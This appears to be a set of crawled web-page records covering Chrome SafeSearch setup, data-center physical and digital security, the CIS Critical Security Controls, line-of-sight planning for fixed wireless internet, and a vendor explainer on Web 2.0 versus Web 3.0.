The internet is an incredible resource, but it can also be a dangerous place for children. This tech-savvy generations thrives on technology, regularly searching the web for content, games, and videos. Devices are now commonplace in the classroom, where rules and regulations are required for digital safety. Tools like content filters and online monitoring help educators keep their students safe from inappropriate or dangerous online content. But as we know, technology is not limited to school time, it’s in our homes and accessible to our kids.
A recent study revealed that nearly 55% of parents show concern over their children’s superior ability to navigate the digital world. Despite their concern, over a third of those parents are educating themselves as much as they can about online safety and learning how to set Chrome SafeSearch is just one of those ways.
Why Should Parents Want to Set Chrome SafeSearch
Technology can often be overwhelming for parents who are not familiar with it or see the ease at which their kids use their own devices. The web can provide kids with lots of fun and entertaining content that is age appropriate, but it can also be easy for them to come across website, images or videos that are questionable. Chrome’s SafeSearch is an easy feature for parents to learn how to enable so they can help protect their kids from online dangers at home.
What Does Chrome SafeSearch Block
Chrome’s SafeSearch feature is a fantastic way to make sure your children do not stumble come across adult or inappropriate content online. Once enabled, searches done through Chrome will filter your results to block adult content by default, including:
- Sexually explicit material
How to Set Chrome SafeSearch
If you are uncomfortable with the level of potentially explicit content that could be in your Google Search results, you can set Chrome to automatically filter these out. This will help make sure that any inappropriate or offensive content is not displayed when you search for something in Chrome whether on a desktop or mobile device.
Set Chrome SafeSearch on a desktop:
- Open your Chrome browser and log into your Google Account
- Go to the Google homepage
- In the bottom right corner click Settings
- Click Search Settings from the pop-up
- At the top of the page select Turn on SafeSearch
- Scroll to the bottom and click the Save button
Set Chrome SafeSearch on a mobile device:
- Open your mobile browser and go to SafeSearch Settings
- To turn on SafeSearch, toggle on Explicit results filter
- To turn off SafeSearch, toggle off Explicit results filter
- When finished, click Back to return to the Google homepage
Chrome SafeSearch at Home and at School
Kids deserve to have a fun and safe online experience, whether they are at home or school. Parents do not need to feel overwhelmed with technology and worry about how to safeguard their kids while surfing the web. Chrome SafeSearch can easily be enabled to extend digital safety from the classroom into the living room with just a few simple steps. | <urn:uuid:c095ed09-5397-464f-9ed7-b0d330027200> | CC-MAIN-2024-38 | https://www.netsweeper.com/education-web-filtering/how-to-set-chrome-safesearch | 2024-09-18T11:20:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00156.warc.gz | en | 0.91812 | 610 | 2.703125 | 3 |
Data centers are the fortresses of the Internet age, the keepers of the digital economy’s most valuable assets. Their gates protect the terabytes and petabytes of data, the server racks that harbour the online world’s infrastructure. But as much as these facilities secure the digital realm, they also house a cog in the physical world – people, workers, and visitors. Ensuring the security of both data and individuals demands a delicate balance between physical and digital safeguards, and it’s a balance that can make or break an organization’s security posture.
In this article, we dive deep into the complexities involved in securing data centers from both physical and digital threats. We will explore the latest trends, best practices, and technologies that guardians of data center security employ to keep the bad actors at bay while maintaining the sanctity of the digital realm.
The Nexus of Physical and Digital Security
Data centers are not just about servers and cables. They are living and breathing entities where physical security controls play just as pivotal a role as digital ones. Physical threats like natural disasters, unauthorized access, and internal misuse hold the potential to cause immeasurable damage to the digital infrastructure and the organizations it supports.
Understanding the Threat Landscape
The first step in data center defence is threat assessment. Organizations must understand the spectrum of potential threats – from brute force attacks on physical infrastructure to sophisticated digital penetration – and should conduct regular risk assessments to identify vulnerabilities.
Integrated Security Systems
An effective security strategy integrates physical and digital elements. Security teams leverage CCTV, biometric access controls, and intrusion detection systems alongside firewalls, encryption, and security information and event management (SIEM) solutions to create a comprehensive security architecture.
The Human Factor
Despite the focus on technology, humans remain a significant factor in data center security. Social engineering attacks, physical theft, and simple human error can compromise the most robust security systems.
Access Controls in the Digital Age
Physical Access Control (PAC) systems are responsible for enforcing role-based access policies and physically granting entry to authorized personnel. These systems not only regulate access but also dictate the time and location parameters, ensuring that only the right people enter designated areas.
Tight Integration with Video Surveillance
Video surveillance is a pivotal component of comprehensive security setups. However, its effectiveness hinges on seamless integration with PAC systems. This integration ensures that access events are monitored and recorded accurately, providing a robust layer of security and aiding in forensic analysis when incidents occur.
Multi-Factor Authentication for Identity Assurance
In an era where digital threats loom large, ensuring identity assurance is paramount. Multi-factor authentication (MFA) solutions serve as the bedrock of this assurance, requiring more than just a password or card swipe for access. These solutions, tightly integrated with PAC systems, offer a diverse array of authentication methods. From traditional card and PIN combinations to advanced biometric recognition like fingerprint or facial authentication, MFA provides flexible and secure authentication pathways. Furthermore, MFA can be deployed in combinations of two or even three factors, such as a card, PIN, and biometric scan, for heightened assurance levels.
The Concentric Rings of Physical Security
Physical barriers are the first line of defence for a data center, deterring unauthorized personnel and presenting a formidable obstacle.
The first ring of defence encompasses the exterior perimeter of a facility. This includes robust fences, secure gates, strategically placed bollards, and barriers designed to deter unauthorized access. These physical barriers serve as the initial deterrent against potential threats, providing a formidable barrier to entry.
Moving inward, the focus shifts to the entry points of the facility. This includes not only conventional doorways but also specialized security features like man traps, designed to control the flow of individuals entering and exiting the premises. Entry points are critical junctures where security measures must be stringent to prevent unauthorized access or breaches.
Within the innermost ring lie the internal areas of the facility. Here, the focus shifts to safeguarding sensitive assets such as data halls, cages, and cabinets. Additionally, attention is paid to essential infrastructure components like power rooms and network infrastructure rooms, which are vital for maintaining the operational integrity of the facility.
Digital Security Measures
Digital security solutions are now strongly integrating into physical access protocols, heralding a new era of comprehensive protection. Here’s a glimpse into this convergence:
Cybersecurity Standards in Physical Security
Cybersecurity standards are now extending their reach to encompass physical security solutions. This evolution demands adherence to robust network security measures, data encryption protocols, efficient certificate management, and the implementation of multi-factor authentication mechanisms. These measures ensure that physical access systems meet the same rigorous standards of protection as their digital counterparts.
Mobile Digital Authentication Solutions
The proliferation of mobile digital authentication solutions has revolutionized access control paradigms. Platforms like Duo, Okta, and PingID, initially designed for internal and IT applications, now find utility in physical security. These solutions offer a versatile means of authentication, seamlessly integrating into multi-factor authentication frameworks for physical access. Leveraging the ubiquity and convenience of mobile devices, organizations can enhance security while streamlining access procedures across digital and physical domains.
Emerging Trends in Data Center Security
The pace of technological advancement means that new trends constantly emerge, challenging data center security professionals to stay ahead of the curve.
Artificial Intelligence and Machine Learning
AI and machine learning are revolutionizing security management by not only predicting and preventing security breaches but also by automating threat detection and analyzing extensive data to pinpoint anomalies. Moreover, these technologies enhance security by more accurately identifying and authenticating users, ensuring higher security standards and faster throughput.
Secure Access Service Edge (SASE)
SASE is an emerging security framework that combines network security functions with WAN capabilities to support the dynamic, secure access needs of organizations. This framework is particularly relevant for the hybrid work environments that are becoming increasingly common.
Zero Trust Architecture
A zero-trust architecture operates on the assumption that threats exist both inside and outside the network. This security model advocates for verifying and securing every device trying to connect to an organization’s network, whether inside or outside its perimeters.
The role of the guardians of the data center is more critical than ever, balancing the protection of the physical facility with the security of its digital contents. By employing a combination of sophisticated physical barriers, and advanced digital security measures, and fostering a culture of vigilance and continuous improvement, organizations can maintain the integrity of their data centers in the face of evolving threats.
For data center personnel, the work is never done. Threats – both physical and digital – continue to evolve and must be met with a corresponding evolution in security strategies. As we look to the future, collaboration between physical and digital security professionals will be key, ensuring that data centers remain not just operational but impervious to the myriad threats that lie in wait. | <urn:uuid:7b91a9f3-1d02-404c-a758-20754258c4ee> | CC-MAIN-2024-38 | https://bioconnect.com/2024/04/26/guardians-of-the-gateway-balancing-physical-access-and-digital-security-in-data-centers/ | 2024-09-20T21:26:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701423570.98/warc/CC-MAIN-20240920190822-20240920220822-00856.warc.gz | en | 0.908751 | 1,401 | 2.640625 | 3 |
Established in 2000, the Centre of Internet Security (CIS) is a global, non-profit community of experts that collectively develops tools, solutions, and best practices for increasing cyber security and mitigating cyber risk.
As well as being renowned for their Benchmarks, which are used to reduce configuration-based vulnerabilities in digital assets, they have developed a cyber risk mitigation framework called the CIS critical security controls.
Arranged into 153 safeguards (previously known as sub-controls) divided across 18 controls, CIS security controls provide organizations with clear best practices and guides for defending against a wide range of cyber attacks.
In this article, we explore the 18 CIS critical security controls, how each enhances your company’s cybersecurity posture, and why they’re effective at mitigating risk.
Why are the CIS critical security controls important?
The CIS critical security controls are important because they provide organizations with a comprehensive and easy-to-follow framework for strengthening their cybersecurity posture.
Because the CIS security controls consist of a prioritized set of best practices that protect against the most common attack vectors, they’re highly instrumental in reducing a company’s exposure to operational, compliance, financial, and reputational risk.
Additionally, with so many cybersecurity tools, frameworks, and methodologies out there, it’s easy for companies to become overwhelmed by the abundance of information. In contrast, by focusing on a select number of actions based on known attack methods, the CIS critical security controls offer organizations a clear path for effective cyber defense.
What Makes the CIS Controls Effective?
Several aspects make the CIS critical security controls so effective:
- Informed by common cyber attacks: the CIS controls are developed from insights gained from actual cyber attacks and the defensive measures that have been proven effective against them.
- Compiled by experts: the controls, and the safeguards that comprise them, are created and maintained by a global community of experts from all sectors, including IT, security, government, defence, finance, academia, consulting, etc.
- Easy to comprehend and communicate: as they hone in on 18 overarching cybersecurity measures, it’s simple to explain the CIS controls to stakeholders, supply chain partners and non-technical personnel. Subsequently, it’s straightforward to report on their implementation and efficacy to management and other invested parties and for them to follow along.
- Measurable progress: the mere fact that there are 18 well-defined controls gives organisations a list to work through to strengthen their cybersecurity posture.
- Better still, however, each CIS control has a series of safeguards divided into three implementation groups (IGs): IG 1, 2, and 3, resulting in 153 total safeguards (referred to as sub-controls in previous versions) across the 18 controls.
- While the safeguards in IG 1 provide basic cyber defence, for companies just starting their cyber security program, IG 3 offers the most comprehensive protection, for larger organisations with more stringent defence and compliance requirements.
- Consequently, the framework enables you to improve your cybersecurity measures as your program matures.
- Mapped against important compliance frameworks: the CIS critical controls have been designed, and are updated, with the most important data privacy regulations and legislation in mind. This makes it easier for organisations to comply with GDPR, HIPAA, PCI DSS, and other frameworks that apply to their industry.
5 Crucial Components of Effective Cyber Defense
The five crucial components of an effective cybersecurity defense plan are:
- Attacks dictate defense: using feedback, i.e., threat intelligence, from actual cyber attacks to provide the information to develop robust, effective defense measures
- Prioritization: developing mechanisms to assess the severity of cyber-attacks and prioritizing actions that most reduce risk exposure- and, preferably, are the most feasible to implement
- Measurements: making use of widely-used metrics to ensure different parts of an organization, whether security personnel, IT teams, C-Suite executives, and other stakeholders, are on the same page in regards to cyber risk mitigation efforts and their efficacy. p
- Continuous monitoring: abandoning static, point-in-time testing for continuous monitoring solutions that provide security teams with constant visibility over the IT infrastructure.
- Automation: utilising automated tools wherever possible to identify and assess cyber threats in an ever-expanding attack surface.
What are the 18 CIS Critical Security Controls?
Here’s an overview of the 18 CIS critical security controls.
1. Inventory Management and Control of Enterprise Assets
The first CIS control centers around creating and maintaining an accurate and up-to-date list of your company’s hardware assets, such as workstations, laptops, mobile devices, servers, and Internet of Things (IoT) and network devices. This also includes hardware not directly under your control, like employee mobile devices and those within a cloud environment.
Implementing the actions outlined by this control not only reveals the total number of hardware assets within an organization’s IT infrastructure that require monitoring and protection but also highlights unauthorized and/or unmanaged assets that could be removed to reduce the size of the attack surface.
2. Inventory and Control of Software Assets
A comprehensive inventory of your company’s software enables you to consistently monitor the applications running on your network for security breaches. Tracking all software assets also alerts security teams to unpatched and unsupported applications with known vulnerabilities that hackers could exploit. This is especially vital as malicious actors rely on the gap between an organization becoming aware of a vulnerability and patching it to breach network security.
Additionally, because you can’t manage applications that you can’t monitor, the safeguards within this control prevent the installation of unauthorized software, i.e., shadow IT, and highlight instances found on the network. As well as providing insight into the true extent of a company’s attack surface, it reduces the risk of malware finding its way onto the network because an employee downloaded a compromised application without permission.
3. Data Protection
As companies integrate more digital solutions into their IT ecosystem, data protection becomes increasingly crucial. This is especially true regarding cloud technology, which necessitates that data is transferred over the internet and stored offsite – which means it’s no longer confined within a company’s conventional network perimeters.
CIS control 3 provides essential guidelines for identifying, classifying, tracking, storing, and disposing of data. This includes setting up and maintaining systems data management, securing data on endpoints (including mobile devices) and encrypting sensitive data while in transit or at rest.
Plus, while a lot of data loss results from malicious action, it can also occur from lax security practices or human error. Because of this, the safeguards in this control also focus on detecting data loss detection and mitigating all other forms of data compromise.
4. Secure Configuration of Enterprise Assets and Software
In their default state, I.e., “out of the box”, hardware and software often come with settings that can leave your network vulnerable to cyber threats. Hackers can exploit default passwords, basic controls, and insecure configurations if left unchanged – and even a single unchecked error can create security risks that disrupt business continuity.
With this in mind, this control focuses on establishing secure and maintaining configurations for hardware and software assets.
5. Account Management
Alarmingly, unauthorized network access is more likely to occur from using valid user credentials – whether from inside or outside an organization – as opposed to hacking. Consequently, CIS critical security control 5 concerns managing user access permissions, password policies, and monitoring account activity.
- Create and maintain an inventory of user accounts
- Enforcing strong password hygiene, e.g., ensuring passwords are a certain length, are changed regularly, etc.
- Deactivating unused accounts
- Limiting admin privileges to a small number of accounts
It’s particularly important to protect admin accounts because cybercriminals can use them to modify assets or create additional accounts with special privileges. They can then use them to make their way further into your network, better cover their tracks and implement subsequent steps in their plans.
6. Access Control Management
While control 5 concerns user account management, this series of safeguards centers around user accounts – or access control management, i.e., user privileges.
Granting overly broad permissions increases insider risk, i.e., intention or accidental data compromise by employees or supply chain partners, as well as the severity of a security breach if a hacker gains control of a user account. Limiting a user’s access rights to what they need to perform their role job (the principle of least privilege) reduces an organization’s cyber risk exposure.
As well as best practices for implementing and maintaining access control systems, this control provides guidelines on granting and revoking permissions with privileged access management (PAM) tools and enabling multi-factor authentication (MFA).
7. Continuous Vulnerability Management
Companies that fail to proactively identify and address IT security flaws are more likely to suffer security breaches and business disruptions. Continuous vulnerability management emphasizes the critical importance of regularly assessing your organization’s cybersecurity posture.
This includes implementing measures to consistently identify, prioritize, and mitigate vulnerabilities within your IT network, whether open ports and misconfigured services or unpatched software and unused user accounts. To achieve this, security teams should follow the prescribed guidelines to establish policies and controls for vulnerability scanning and ensure they consistently obtain up-to-date threat intelligence.
8. Audit Log Management
Malicious actors know that while some organizations maintain audit logs for compliance purposes, they don’t analyze them consistently. Armed with this knowledge, they can hide within your network for extended periods without detection – and can cover their tracks more effectively.
CIS security control 8 details actions concerning the review and retention of event logs of your network. Regularly analyzing audit logs enables security teams to better identify suspicious activities and quickly respond to mitigate their impact.
- Developing and maintaining an audit log management system
- Regularly reviewing audit logs
- Keeping logs for a specified period
- Obtaining logs from service providers
9. Email and Web Browser Protections
Browsers and email clients are common targets for hackers because of their large user bases and the high frequency with which they’re used. They’re especially susceptible to malware infections and social engineering attacks, which provide cybercriminals with an entry point into networks.
Consequently, the safeguards that comprise this control are designed to prevent phishing, downloading malware, phishing, and other web-based cyber attacks. This includes only using fully supported browsers and email applications, setting up filters to block malicious (and suspicious) web addresses and file extensions, and maintaining secure domain name system settings.
10. Malware Defenses
Control 10 provides best practices for preventing the installation and spread of malicious software and code, such as viruses and ransomware. It emphasizes the use of anti-malware solutions to regularly scan your IT ecosystems to detect, contain, and eliminate malware found in endpoints, websites, applications, and network devices.
However, one of the reasons malware is so dangerously effective is that malicious actors are constantly devising new strains – including polymorphic malware that can alter its signature to prevent detection. Because of this, the safeguards in this control call for behavior-based anti-malware tools, which look for patterns indicative of malicious code, as well as signature-based detection, which recognizes known malware.
11. Data Recovery
An essential part of effective incident response is quickly restoring your systems to a secure state after a cyber attack – which requires a reliable data backup and recovery process. The actions laid out in this control help companies implement automated backups, protect and isolate backup data, and test their recovery procedures.
An effective data recovery process helps protect your organization from cyber attacks where hackers gain access to your network and modify settings, create illegitimate user accounts, and install malicious software. Such actions can be difficult to detect and require reverting your ecosystem to a time before the security breach. This control also guards against accidental data deletion, modification, and other human error, which can be rectified with up-to-date backups.
12. Network Infrastructure Management
Network devices, such as switches, routers, and firewalls, are typically initially configured for an easy setup – instead of for security. Consequently, hackers search for vulnerabilities in network infrastructure, like weak configurations and default passwords, and exploit them to breach a company’s defensive measures.
To mitigate this, control 12 provides guidelines for setting up, evaluating, reconfiguring, and managing network devices. This begins with clearly documenting all aspects of your network infrastructure and continually monitoring it for modifications that could indicate a security risk.
13. Network Monitoring and Defense
Cybersecurity controls are most effective when part of a continuous monitoring process that allows security personnel to receive and receive alerts that enable them to promptly contain and mitigate the effects of security incidents.
CIS critical security control 13 covers processes and tools for continuous monitoring and defense, which allow organizations to collect and analyze data on network traffic, manage access control, and perform alerts. Additionally, the safeguards in this control provide best practices on how to filter and control the flow of traffic between sections of your network – making it easier to both manage access to assets and data, as well as contain cyber attacks if they occur.
14. Security Awareness and Skills Training
Because employees are the difference between whether a company’s cyber risk mitigation efforts succeed or fail, it’s critical that they’re educated on how their actions can compromise security.
This could be through:
- Using weak passwords or reusing them too often
- Mishandling sensitive data
- Falling for phishing attempts
- Losing a mobile device
- Installing compromised applications
- Visiting compromised sites
For this reason, it’s essential for companies to invest in cybersecurity awareness training that engenders a security-conscious mindset and reduces risk exposure.
A key aspect of this is educating your employees on common cyber attacks – and how and who to report them to if they occur. It’s also imperative to teach the causes of unintentional data exposure and, by extension, how to handle data securely. Additionally, for those within your company who handle the most sensitive data, it’s prudent to provide them with role-specific training to enhance their situational awareness and skillset.
15. Service Provider Management
This control recommends assessment, management, and monitoring of third-party service providers that have access to your assets and data – with particular emphasis on protecting sensitive data.
It includes best practices for creating and maintaining an up-to-date inventory of service providers, assessing suppliers to determine their security posture, and how to securely end your association (e.g., ensuring they securely dispose of your data) if necessary. The safeguards in CIS security control 15 also include provisions for monitoring the security practices of your third party providers and how to co-operate with them to help them improve their cyber risk mitigation strategies and ensure compliance.
16. Application Software Security
While control 2 is concerned with the cataloguing of software assets and control 15 addresses third-party applications, CIS critical security control 16 details safeguards for custom software development. It provides guidelines on implementing secure application development practices and processes to ensure the ongoing security of bespoke software and systems within your IT ecosystem. This includes creating standardized configuration templates for robust application architecture and mechanisms for identifying, prioritizing, and remediating software vulnerabilities.
Additionally, as development teams integrate third-party components into custom applications, from frameworks, code libraries, etc., it’s vital to catalogue them so they can be continuously monitored for vulnerabilities. Better still, companies should only use trusted components from reputable vendors with high, independently verified security ratings.
17. Incident Response Management
Despite an organization’s best cyber risk mitigation efforts, attacks will still take place. Consequently, CIS critical security control 17 is about developing and implementing a comprehensive incident response plan (IRP) – also known as a Playbook – that outlines the steps to follow during and after a security event.
Best practices include assigning specific roles and responsibilities to employees in the event of a security incident and establishing protocols for reporting suspected malicious activity. Similarly, you need to have processes in place for how to communicate in regards to security events – namely, when employees are allowed to discuss a breach and who with.
It’s also vital to establish a robust process concerning what your staff do after a security event as well as during it. This should include a thorough analysis of the incident to determine how to best prevent it from recurring and learning as much about the nature of the attack to add to your threat intelligence.
18. Penetration Testing
With the consistent emergence of new technology and malicious actors consistently developing new attack methods, it’s not enough for organizations to look for known vulnerabilities or rely on their existing defense measures.
The final CIS critical security control accounts for this by providing guidelines on performing penetration tests: a proactive cyber risk mitigation strategy that sees security teams attempt to breach, or penetrate, their own security measures to test their effectiveness. In essence, penetration testing requires you to think like a hacker – exploiting the same attack vectors they would.
In addition to testing your implemented cybersecurity measures and fixing those that prove ineffective, penetration tests allow organizations to acquire new threat intelligence and devise ways to reduce their attack surface.
How RiskXchange can help enhance your organization’s cybersecurity posture
Through a thorough analysis of your company’s attack surface, we can determine where you’re most vulnerable to cyber threats. From there, we’ll help implement the CIS critical security controls that best protect your IT infrastructure from cyber attacks.
Contact us to schedule your free trial.
CIS critical security controls FAQs
What is the meaning of CIS Critical Security Controls?
The CIS critical security controls are a risk mitigation framework that provides organizations with a series of best practices for implementing measures to protect against the most common cyber attacks.
There are 18 CIS security controls, each comprising a series of actionable safeguards (153 in total). Part of the simplicity of the CIS controls is that companies don’t have to implement every safeguard – just those that correspond to their level of risk.
What is an example of a CIS cybersecurity control?
Each CIS control is numbered from 1 – 18, so CIS security control 1, for instance, is called Inventory and Control of Enterprise Assets. It details best practices for cataloguing, classifying, and monitoring an organization’s hardware assets so any vulnerabilities can be discovered and mitigated by security teams.
What is the difference between CIS critical security controls and NIST?
While the Center for Internet Security (CIS) is a global, nonprofit organization composed of a wide range of experts, the National Institute of Standards and Technology (NIST) is a part of the U.S. government (under the Department of Commerce.
Additionally, while CIS controls specifically cover cybersecurity, there are different NIST frameworks with varying scopes – with the NIST Cybersecurity Framework (CSF) designed for cyber risk mitigation. | <urn:uuid:b69993e5-2450-4080-8bcf-9a615a503d66> | CC-MAIN-2024-38 | https://riskxchange.co/1007724/cis-critical-security-controls/ | 2024-09-13T16:06:08Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00656.warc.gz | en | 0.929049 | 3,930 | 2.75 | 3 |
It has already been established that a properly executed fixed wireless Internet network consistently provides faster and more secure data speeds, and is much easier and less expensive to install, upgrade, and operate. Moreover, their relative independence from fiber and cable networks make their design, planning, and implementation far faster and more efficient than other options.
One of the major questions that arise when companies are considering a fixed wireless Internet connection concerns line of sight (LOS) considerations. This is likely the major obstacle that fixed wireless providers deal with when developing a network for clients. MHO discusses LOS considerations and explains how line of sight issues are handled with potential clients.
How Important is Line of Sight to Fixed Wireless Internet?
Line of sight refers to a direct view of another object. If you can see the object, however far away, it is in your line of sight. This is important for a microwave radio communications system because the signals operate by line of sight. This means that each radio transmitter and receiver must be in a direct line with, and have a direct view of, other stations.
This is a primary consideration when laying out a proposed fixed wireless network for a potential ISP client. The receiving station must be in a direct line of sight with the transmitting stations and/or base station in order to send and receive signals. Without this effect, the signals can be blocked and the system is basically inoperative.
What are Some Barriers to Line of Sight for Fixed Wireless Internet?
Generally, the frequencies at which fixed wireless Internet systems operate require an 80% unobstructed line of sight in order to function properly. Natural or man-made stationary obstacles can interfere with this layout and block the radio signals. This can include:
- Overgrowth of trees
Another consideration with line of sight is the curvature of the earth. At too great a distance, the curvature of the earth causes the planet itself to become a natural barrier to the line of sight required for operation. This problem is usually minimal, since most fixed wireless connections are preferred at a maximum distance of 30 miles.
How Does MHO Handle LOS Considerations?
MHO engineers employ satellite imagery when determining the layout for potential clients and a fixed wireless Internet network. Through this accurate and up-to-date imaging, engineers can verify that MHO's infrastructure is within a direct line of sight with a client’s building. This also allows for the consideration of tall trees, hills, buildings, and bridges that could present a problem in the proposed radio pathway.
Other items that may be overlooked by some companies can include existing equipment on the client’s roof (HVAC units), roof parapets, and the best placement on the roof for MHO’s fixed wireless equipment. A building’s elevation is also a key feature that contributes to line of sight and system positioning.
When your company seeks to work with MHO on a fixed wireless Internet network, the results from our LOS survey will fall into three basic categories:
- Yes - We have clear visibility from our tower site and should be able to provide service to the client.
- Probable - We might have LOS, but will need to perform a survey at the client’s site. Computer software isn’t always 100% accurate, so if the path shows any possible obstruction, then a site survey is required to be certain.
- Not at this time - LOS is blocked to all towers that belong to MHO within the area at this time. However, it is always encouraged for clients to reach out again at a later date, as MHO's network is always growing and are adding more tower locations.
In some circumstances where line of sight cannot be directly obtained, MHO may be able to erect a relay. In the event the client requires a fixed wireless service and requests it, MHO can implement this technology to connect the client’s building to the nearest tower. Sometimes this relay can be positioned on another existing building in the area that has a clear line of sight to MHO's tower as well as the client's location. Note that this service requires additional cost and a longer installation timeframe to complete. | <urn:uuid:6b58862c-90b9-488a-a571-0e9edadddf01> | CC-MAIN-2024-38 | https://blog.mho.com/line-of-sight-considerations-for-fixed-wireless | 2024-09-16T02:41:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.29/warc/CC-MAIN-20240916012328-20240916042328-00456.warc.gz | en | 0.949312 | 851 | 2.703125 | 3 |
Web 2.0 vs. Web 3.0: Differences Defined
With the web in a constant state of flux, it’s important to differentiate between Web 2.0 and Web 3.0 and prepare for the next web installation.
What is a Web 3.0 website? Web 3.0 is powered by artificial intelligence and uses blockchain technology to create a more secure, private, and decentralized web experience.
What Was Web 1.0?
The first and earliest stage of internet development is colloquially known as Web 1.0, although (obviously) it wasn’t referred to until the rapid and ubiquitous deployment of Web 2.0 technology.
Web 1.0 covers the early days of dial-up connections, AOL, and the internet as new and emerging technology.
Primary Web 1.0 technologies include the following:
HyperText Markup Language
HTML is the descriptive foundation of a content as it is presented on the internet. “Markup” languages, in this context, are a form of metadata that define how a web browser should display content.
Using the concept of nesting tags and document structure to standardize the presentation of content online, HTML allows web developers to format text, include different forms of media (video, images, or audio), and embed hyperlinks directly into text.
Hyperlinks are, in some respects, the backbone of content in the Web 1.0 paradigm. Links connect pages such that a reader can navigate through pages quickly and logically. Without links, web content would end up siloed on different servers, requiring users to know the direct URL address of that content to access it.
Subsequently, the use of links saw the rise of web portals and, eventually, search engines where users could easily navigate the rapidly increasing content available on the web.
HyperText Transfer Protocol
To facilitate the transfer of HTML documents from servers to users on their desktops, developers, like Tim Berners-Lee, began building a protocol to quickly and reliably exchange information like HTML.
Before the advent of HTTP, it was still common for computers to exchange information via file-sharing protocols like FTP. However, this approach wasn’t necessarily intuitive nor did it integrate seamlessly with the purpose of HTML—namely, to download and display content.
HTTP provided a way for servers to receive data requests from users that would navigate to that content via a Uniform Resource Locator (URL), a string of characters specifying the domain location and directory of a document. Over time, evolutions of the HTTP protocol would introduce faster data transfer speeds, persistent connections and additional security through the HyperText Transfer Protocol Secure (HTTPS) extension.
Web 1.0 is denoted by static, persistent web pages, typically relying more on text information than graphics to convey messages. Some preliminary efforts towards eCommerce rose during this time as well.
What Is Web 2.0?
In the early 2000s, web developers began to look at the existing paradigm of web development as a limitation, rather than an expansion, of interactivity with and between users. While Web 1.0 utterly transformed communication for enterprises and users throughout the 1990s, specialists and engineers began to look into ways to replace bland web pages.
Some of the technologies that emerged over the early 2000s and for the next 15-20 years include the following:
Databases and PHP
Databases weren’t new at the time—in fact, databases had been around, in one way or another, for decades. However, there was never an easy way to utilize database information to serve user requests as they were made.
A major step towards developing such capabilities was the integration of the PHP: Hypertext Preprocessor scripting language. And yes, you read that correctly—the name is a recursive acronym that refers to itself.
PHP is a server-side language that bridged the gap between client-side web presentation (HTML) and server databases. Programmers could develop systems that take user input from HTML forms, process it as a formal request to a database through SQL, and return the results as a new web page formatted HTML.
The development of PHP and database integration allowed for the development of more dynamic websites like blogs, the popularity of which signaled the start of Web 2.0.
The move from static web pages led to the integration and foregrounding of rich media. Web 1.0 content would often include images, audio, and in some cases, embedded video. Limitations in hardware and Internet infrastructure made moving large data files around harder, limiting how media could be used.
In Web 2.0, visual media is just as important, if not more so, than text. Large, high-resolution images are much more common, and video is equally as common as a static image. More importantly, streamlining video, or video played instantaneously from a central server rather than necessitating a complete download, has changed how we consume media.
Early blogging relied on databases and PHP, but using a blog at home became much more accessible to users when they had more interactive tools to use to write in them—most users don’t have the technical skills to write text and store that text in a database, after all.
Perhaps the most impactful development during this time, and of Web 2.0 broadly, was that of social media. Real-time updates, interactive media, and short, bite-sized pieces of content streamlined publishing and sharing. They ushered in the rise of media platforms like WordPress, Facebook, Twitter, Amazon, and Google.
Platforms and major eCommerce sources often rely on large, centralized platforms to serve high bandwidth and provide high availability. However, many users have begun to raise concerns about this kind of decentralization, including issues around censorship, privacy, and the commercial use of personal information.
In some areas, decentralized infrastructure developments have become a major topic of interest. Technologies like BitTorrent have provided the initial stirrings of a decentralized network, even if it is a bit limited as a file-sharing tool. BitTorrent uses P2P transactions, where users share information directly without needing a centralized server.
What Is Web 3.0?
Moving to Web 3.0 is predicated on decentralizing the web, making the web more intelligent, more ubiquitous, and more device-agnostic.
Some of the major innovations in web 3.0 include the following:
Decentralization is a major part of the Web 3.0 approach, and nothing is pushing that concept further than the blockchain. Originally invented as a ledger for the Bitcoin network, blockchains are decentralized forms of record-keeping that rely on cryptography and various verification methods to ensure the ledger’s integrity.
While the broad, public chains of cryptocurrency aren’t quite ready for enterprise use, tailored, private chains are finding a home in enterprise data storage and record-keeping, particularly where security and immutability are required.
With the advent of massively-scalable cloud computing platforms and specialized artificial intelligence applications, modern web enterprises have turned online cloud platforms into intelligent systems that can perform advanced predictive analytics and drive autonomous machines.
While AI has a wide range of applications, it’s especially influential in online data-driven apps for human users and machine agents in different systems. This kind of user-machine and machine-machine interaction are radically changing how we interact with common forms of digital media like social media, online games, or other SaaS apps.
Tim Berners-Lee hypothesized that Web 3.0 would be dominated by metadata—data about data that allows for richer machine-reading and interpretation. And in many cases, we see this emerge as the driving engine of this new paradigm.
It’s critical to understand that things like AI and powerful computing platforms rely on robust metadata to the extent that metadata becomes just as important, if not more so than the data itself. Accordingly, evolving standards in metadata, like XML, JSON, and other schemes, are driving data categorization.
Authentication and Identity in Web 3.0 with 1Kosmos
One of the most important parts of Web 3.0 is security. Information must be secure with millions of users (and all their data) plugged into public and enterprise systems. Web 3.0 technology like the blockchain and AI can power more robust identity management platforms and advanced biometrics.
With 1Kosmos BlockID, you get an authentication and identity solution built for the future of Web 3.0. This kind of future-looking technology comes with the implementation of specific features like the following:
- SIM Binding: The BlockID application uses SMS verification, identity proofing, and SIM card authentication to create solid, robust, and secure device authentication from any employee’s phone.
- Identity-Based Authentication: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through credential triangulation and identity verification.
- Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API and SDK.
- Identity Proofing: BlockID verifies identity anywhere, anytime, and on any device with over 99% accuracy.
- Privacy by Design: Embedding privacy into the design of our ecosystem is a core principle of 1Kosmos. We protect personally identifiable information in a distributed identity architecture and the encrypted data is only accessible by the user.
- Private and Permissioned Blockchain: 1Kosmos protects personally identifiable information in a private and permissioned blockchain, encrypts digital identities, and is only accessible by the user. The distributed properties ensure no databases to breach or honeypots for hackers to target.
- Interoperability: BlockID can readily integrate with existing infrastructure through its 50+ out-of-the-box integrations or via API/SDK.
